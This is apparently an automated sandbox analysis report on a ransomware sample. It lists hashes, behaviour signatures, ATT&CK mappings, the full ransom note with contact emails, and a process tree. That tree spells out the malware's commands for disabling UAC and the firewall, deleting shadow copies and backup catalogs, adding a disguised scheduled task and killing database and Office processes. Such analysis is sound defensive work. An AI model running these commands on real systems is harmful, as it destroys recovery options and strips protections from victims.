Overview

overview

10

Static

static

sample.exe

windows7_x64

10

sample.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    134s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    04-05-2022 19:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sample.exe

  • Size

    1.1MB

  • MD5

    a56644a519d6fce5f20a744ae3820af2

  • SHA1

    93acd978da4a602c9ea1a23b6a97d74ced436e56

  • SHA256

    563daaab9f9d7be02f037c540d561c424aa3e5efc6a9a5c8d58858d98e2aae3c

  • SHA512

    5ee5ae6d10bb4c3290664454666bd5f82d694bb772d9d5e6dc9e29cb7129cf696ac5b694676eb78074e4196a459e66f6b34b920017af1cd2addb35a1e1b85416

Score
10/10
evasionransomwarespywarestealertrojan

Malware Config

Extracted

Path

C:\Read_Me!_.txt

Ransom Note
All Your Files Encrypted And Sensitive Data Downloaded (Financial Documents,Contracts,Invoices etc.. ). To Get Decryption Tools You Should Buy Our Decrption Tools And Then We Will Send You Decryption Tools And Delete Your Sensitive Data From Our Servers. If Payment Is Not Made We have to Publish Your Sensitive Data If Necessary Sell Them And Send Them To Your Competitors And After A While Our Servers Will Remove Your Decrypion Keys From Servers. Your Files Encrypted With Strongest Encryption Algorithm So Without Our Decryption Tools Nobody Can't Help You So Do Not Waste Your Time In Vain! Your ID: mnelHr Email Address: Starmoon@my.com In Case Of Problem With First Email Send Us Mail At : starmoonio@tutanota.com Send Your ID In Email And Check Spam Folder. This Is Just Business To Get Benefits, If Do Not Contact Us After 48 Hours Decryption Price Will x2. What Guarantee Do We Give You ? You Should Send Some Encrypted Files To Us For Decryption Test. ---------------------------------------------------------------------- Attention! Do Not Edit Or Rename Encrypted Files. Do Not Try To Decrypt Files By Third-Party Or Data Recovery Softwares It May Damage Files. In Case Of Trying To Decrypt Files With Third-Party Sofwares,This May Make The Decryption Harder So Prices Will Be Rise. ---------------------------------------------------------------------- How To Buy Bitcoin : Buy Bitcoin Instructions At LocalBitcoins : https://localbitcoins.com/guides/how-to-buy-bitcoins Buy Bitcoin Instructions At Coindesk And Get More Info By Searching At Google : https://www.coindesk.com/learn/how-can-i-buy-bitcoin/
Emails

Starmoon@my.com

starmoonio@tutanota.com

Signatures

  • UAC bypass 3 TTPs
    evasiontrojan
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 7 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unexpected DNS network traffic destination 3 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 10 IoCs
    evasion
  • Enumerates processes with tasklist 1 TTPs 10 IoCs
  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 40 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sample.exe
    "C:\Users\Admin\AppData\Local\Temp\sample.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:964
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3612
      • C:\Windows\SysWOW64\findstr.exe
        findstr /i "dcdcf"
        3⤵
          PID:620
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist /v /fo csv
          3⤵
          • Enumerates processes with tasklist
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1080
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ver
        2⤵
          PID:832
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat
          2⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:2124
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4832
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat
              4⤵
                PID:2952
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\h4_svc.bat" "
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:4080
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist /v
                  5⤵
                  • Enumerates processes with tasklist
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1032
                • C:\Windows\SysWOW64\find.exe
                  find /I /c "dcdcf"
                  5⤵
                    PID:4608
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 15 /nobreak
                    5⤵
                    • Delays execution with timeout.exe
                    PID:4476
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist /fi "ImageName eq sample.exe" /fo csv
                    5⤵
                    • Enumerates processes with tasklist
                    PID:2308
                  • C:\Windows\SysWOW64\find.exe
                    find /I "sample.exe"
                    5⤵
                      PID:1804
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 15 /nobreak
                      5⤵
                      • Delays execution with timeout.exe
                      PID:2996
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist /fi "ImageName eq sample.exe" /fo csv
                      5⤵
                      • Enumerates processes with tasklist
                      PID:4900
                    • C:\Windows\SysWOW64\find.exe
                      find /I "sample.exe"
                      5⤵
                        PID:3080
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /t 15 /nobreak
                        5⤵
                        • Delays execution with timeout.exe
                        PID:2620
                      • C:\Windows\SysWOW64\tasklist.exe
                        tasklist /fi "ImageName eq sample.exe" /fo csv
                        5⤵
                        • Enumerates processes with tasklist
                        PID:1692
                      • C:\Windows\SysWOW64\find.exe
                        find /I "sample.exe"
                        5⤵
                          PID:2028
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /t 15 /nobreak
                          5⤵
                          • Delays execution with timeout.exe
                          PID:3152
                        • C:\Windows\SysWOW64\tasklist.exe
                          tasklist /fi "ImageName eq sample.exe" /fo csv
                          5⤵
                          • Enumerates processes with tasklist
                          PID:3668
                        • C:\Windows\SysWOW64\find.exe
                          find /I "sample.exe"
                          5⤵
                            PID:5108
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /t 15 /nobreak
                            5⤵
                            • Delays execution with timeout.exe
                            PID:1052
                          • C:\Windows\SysWOW64\tasklist.exe
                            tasklist /fi "ImageName eq sample.exe" /fo csv
                            5⤵
                            • Enumerates processes with tasklist
                            PID:2156
                          • C:\Windows\SysWOW64\find.exe
                            find /I "sample.exe"
                            5⤵
                              PID:612
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 15 /nobreak
                              5⤵
                              • Delays execution with timeout.exe
                              PID:2332
                            • C:\Windows\SysWOW64\tasklist.exe
                              tasklist /fi "ImageName eq sample.exe" /fo csv
                              5⤵
                              • Enumerates processes with tasklist
                              PID:1560
                            • C:\Windows\SysWOW64\find.exe
                              find /I "sample.exe"
                              5⤵
                                PID:1556
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 15 /nobreak
                                5⤵
                                • Delays execution with timeout.exe
                                PID:3016
                              • C:\Windows\SysWOW64\tasklist.exe
                                tasklist /fi "ImageName eq sample.exe" /fo csv
                                5⤵
                                • Enumerates processes with tasklist
                                PID:1180
                              • C:\Windows\SysWOW64\find.exe
                                find /I "sample.exe"
                                5⤵
                                  PID:4380
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 15 /nobreak
                                  5⤵
                                  • Delays execution with timeout.exe
                                  PID:1112
                                • C:\Windows\SysWOW64\tasklist.exe
                                  tasklist /fi "ImageName eq sample.exe" /fo csv
                                  5⤵
                                  • Enumerates processes with tasklist
                                  PID:2124
                                • C:\Windows\SysWOW64\find.exe
                                  find /I "sample.exe"
                                  5⤵
                                    PID:1804
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 15 /nobreak
                                    5⤵
                                    • Delays execution with timeout.exe
                                    PID:4364
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 90 /nobreak
                                    5⤵
                                    • Delays execution with timeout.exe
                                    PID:5100
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2728
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f
                                3⤵
                                • Creates scheduled task(s)
                                PID:4288
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c echo %date%-%time%
                              2⤵
                                PID:4408
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4772
                                • C:\Windows\SysWOW64\systeminfo.exe
                                  systeminfo
                                  3⤵
                                  • Gathers system information
                                  PID:2064
                                • C:\Windows\SysWOW64\find.exe
                                  find /i "os name"
                                  3⤵
                                    PID:2344
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
                                  2⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1980
                                  • C:\Windows\SysWOW64\systeminfo.exe
                                    systeminfo
                                    3⤵
                                    • Gathers system information
                                    PID:2484
                                  • C:\Windows\SysWOW64\find.exe
                                    find /i "original"
                                    3⤵
                                      PID:1408
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ver
                                    2⤵
                                      PID:3396
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
                                      2⤵
                                        PID:3868
                                        • C:\Windows\SysWOW64\nslookup.exe
                                          nslookup myip.opendns.com. resolver1.opendns.com
                                          3⤵
                                            PID:5056
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
                                          2⤵
                                            PID:5028
                                            • C:\Windows\SysWOW64\reg.exe
                                              reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                              3⤵
                                              • Modifies registry key
                                              PID:2796
                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                              wmic shadowcopy delete
                                              3⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1580
                                            • C:\Windows\SysWOW64\netsh.exe
                                              netsh advfirewall set currentprofile state off
                                              3⤵
                                                PID:5060
                                              • C:\Windows\SysWOW64\netsh.exe
                                                netsh firewall set opmode mode=disable
                                                3⤵
                                                  PID:3632
                                                • C:\Windows\SysWOW64\netsh.exe
                                                  netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
                                                  3⤵
                                                    PID:1884
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
                                                  2⤵
                                                    PID:4376
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im msftesql.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2828
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im sqlagent.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4348
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im sqlbrowser.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3836
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im sqlservr.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4064
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im sqlwriter.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4272
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im oracle.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4984
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im ocssd.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2732
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im dbsnmp.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4028
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im synctime.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1068
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im agntsvc.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1996
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im mydesktopqos.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1200
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im isqlplussvc.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1380
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im xfssvccon.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3648
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im mydesktopservice.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2332
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im ocautoupds.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:924
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im agntsvc.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1556
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im encsvc.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:544
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im firefoxconfig.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:3756
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im tbirdconfig.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:1232
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im ocomm.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:1112
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im mysqld.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:1080
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im mysqld-nt.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:4148
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im mysqld-opt.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:3040
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im dbeng50.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:4412
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im sqbcoreservice.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:4360
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im excel.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:4344
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im infopath.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:2980
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im msaccess.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:1032
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im mspub.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:932
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im onenote.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:2608
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im outlook.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:3528
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im powerpnt.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:1456
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im steam.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:2836
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im thebat.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:3160
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im thebat64.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:4660
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im thunderbird.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:2392
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im visio.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:3620
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im winword.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:3468
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /im wordpad.exe
                                                      3⤵
                                                      • Kills process with taskkill
                                                      PID:3284
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe
                                                    2⤵
                                                      PID:4452
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im notepad.exe
                                                        3⤵
                                                        • Kills process with taskkill
                                                        PID:1628
                                                    • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Read_Me!_.txt
                                                      2⤵
                                                        PID:4728
                                                      • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Read_Me!_.txt
                                                        2⤵
                                                          PID:4144
                                                      • C:\Windows\system32\vssvc.exe
                                                        C:\Windows\system32\vssvc.exe
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4036

                                                      Network

                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                      Initial Access

                                                      Execution

                                                      Scheduled Task

                                                      1
                                                      T1053

                                                      Persistence

                                                      Modify Existing Service

                                                      1
                                                      T1031

                                                      Scheduled Task

                                                      1
                                                      T1053

                                                      Privilege Escalation

                                                      Bypass User Account Control

                                                      1
                                                      T1088

                                                      Scheduled Task

                                                      1
                                                      T1053

                                                      Defense Evasion

                                                      Bypass User Account Control

                                                      1
                                                      T1088

                                                      Disabling Security Tools

                                                      1
                                                      T1089

                                                      Modify Registry

                                                      2
                                                      T1112

                                                      File Deletion

                                                      1
                                                      T1107

                                                      Credential Access

                                                      Credentials in Files

                                                      1
                                                      T1081

                                                      Discovery

                                                      Query Registry

                                                      2
                                                      T1012

                                                      System Information Discovery

                                                      4
                                                      T1082

                                                      Peripheral Device Discovery

                                                      1
                                                      T1120

                                                      Process Discovery

                                                      1
                                                      T1057

                                                      Lateral Movement

                                                      Collection

                                                      Data from Local System

                                                      1
                                                      T1005

                                                      Exfiltration

                                                      Command and Control

                                                      Impact

                                                      Inhibit System Recovery

                                                      1
                                                      T1490

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msoshext.dll
                                                        Filesize

                                                        1.7MB

                                                        MD5

                                                        c606bd7c9c733dd27f74157c34e51742

                                                        SHA1

                                                        aab92689723449fbc3e123fb614dd536a74b74d4

                                                        SHA256

                                                        606390649012b31b5d83630f1186562e4b1ce4023d8870d8c29eb62e7e0769e0

                                                        SHA512

                                                        5f8fabe3d9753413d1aedcc76b9568c50dd25a5a6aeacd1ce88aecc28c0ba96dac80177679d380708213a0997946e49383bdaca7114c8c9526a24ed999194e38

                                                        Download Submit
                                                      • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp140.dll
                                                        Filesize

                                                        613KB

                                                        MD5

                                                        c1b066f9e3e2f3a6785161a8c7e0346a

                                                        SHA1

                                                        8b3b943e79c40bc81fdac1e038a276d034bbe812

                                                        SHA256

                                                        99e3e25cda404283fbd96b25b7683a8d213e7954674adefa2279123a8d0701fd

                                                        SHA512

                                                        36f9e6c86afbd80375295238b67e4f472eb86fcb84a590d8dba928d4e7a502d4f903971827fdc331353e5b3d06616664450759432fdc8d304a56e7dacb84b728

                                                        Download Submit
                                                      • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140.dll
                                                        Filesize

                                                        83KB

                                                        MD5

                                                        1453290db80241683288f33e6dd5e80e

                                                        SHA1

                                                        29fb9af50458df43ef40bfc8f0f516d0c0a106fd

                                                        SHA256

                                                        2b7602cc1521101d116995e3e2ddfe0943349806378a0d40add81ba64e359b6c

                                                        SHA512

                                                        4ea48a11e29ea7ac3957dcab1a7912f83fd1c922c43d7b7d78523178fe236b4418729455b78ac672bb5632ecd5400746179802c6a9690adb025270b0ade84e91

                                                        Download Submit
                                                      • C:\Read_Me!_.txt
                                                        Filesize

                                                        1KB

                                                        MD5

                                                        f9f261a411dd279fdf572a7b85ad3c35

                                                        SHA1

                                                        aa4c4ab38c5199b8f00314e2610e7ef420fd5542

                                                        SHA256

                                                        66607908902577f4cff760490e61d20012387532d61e2dc3bbbd3ae3297fc0ec

                                                        SHA512

                                                        e6e1570d9cef61c3f937ae29d42af3e97017addeb07a12304b1922a9758a8a8051f33261cd26f00956a4559f903675609820b6e802a4c5d169bbd35d224dd202

                                                        Download Submit
                                                      • C:\Users\Admin\AppData\h4_svc.bat
                                                        Filesize

                                                        1KB

                                                        MD5

                                                        4d428091b2808d90b7945c27b2c23a04

                                                        SHA1

                                                        d74afbc10ad68549bb9b27132b573d980785c2a7

                                                        SHA256

                                                        00eb0cf67c2cfa7f93b67c3320e897effb70d022dce30a40a70f044a4d9518e2

                                                        SHA512

                                                        90ec5493e498dc102ad22f708a8fd334e9f4311101f5534f99c5fd773d9e9db9441832942eefdfefb8d32c223635bcfa6af79b5cef47508adb7afe3c5b4a18a7

                                                        Download Submit
                                                      • C:\Users\Admin\AppData\t2_svc.bat
                                                        Filesize

                                                        138B

                                                        MD5

                                                        702f5dc6f9dec28c8c9b7b6885c9fe09

                                                        SHA1

                                                        dbb85da6de899deb21ce0a8f25c1726cd19e49e8

                                                        SHA256

                                                        20bf5224af318c449407c99e5f4628f71b874463a1cb777031a43b6236ab97e9

                                                        SHA512

                                                        fa4bfc3ac77561585d03bf62e7bb4de0602cf442b5c54b70945f8c75114d111559f50ad36026e2bb1027323f7f50130b7c60bee22835400a8a07feab436ccff7

                                                        Download Submit
                                                      • C:\Users\Admin\AppData\v9_svc.vbs
                                                        Filesize

                                                        686B

                                                        MD5

                                                        e9c50acda9063b2462697bdbd0a0dfe2

                                                        SHA1

                                                        d1a2bc54905ce0e9121f8e5c249e0527f2190b7e

                                                        SHA256

                                                        f236c75a867944ce27e123b3aaf3a465084bc6135dc453f7f4aacb1cbf9946bd

                                                        SHA512

                                                        d5cd841b82867e323f5cd28f97c9a27ea32be1b3793cb7ddff1ccc3c0559c6b3758f6366d259eda2265431f67a1eebe41dcfb2047ee94c515eb458af6311b8a9

                                                        Download Submit
                                                      • C:\Users\Read_Me!_.txt
                                                        Filesize

                                                        1KB

                                                        MD5

                                                        f9f261a411dd279fdf572a7b85ad3c35

                                                        SHA1

                                                        aa4c4ab38c5199b8f00314e2610e7ef420fd5542

                                                        SHA256

                                                        66607908902577f4cff760490e61d20012387532d61e2dc3bbbd3ae3297fc0ec

                                                        SHA512

                                                        e6e1570d9cef61c3f937ae29d42af3e97017addeb07a12304b1922a9758a8a8051f33261cd26f00956a4559f903675609820b6e802a4c5d169bbd35d224dd202

                                                        Download Submit
                                                      • memory/544-179-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/620-132-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/832-133-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/924-177-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/932-194-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1032-193-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1032-147-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1068-171-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1080-131-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1080-183-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1112-182-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1200-173-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1232-181-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1380-174-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1408-152-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1556-178-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1580-158-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1804-185-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1884-161-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1980-150-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/1996-172-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/2064-144-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/2124-134-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/2308-184-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/2332-176-0x0000000000000000-mapping.dmp
                                                        Download
                                                      • memory/2344-145-0x0000000000000000-mapping.dmp
                                                        Download
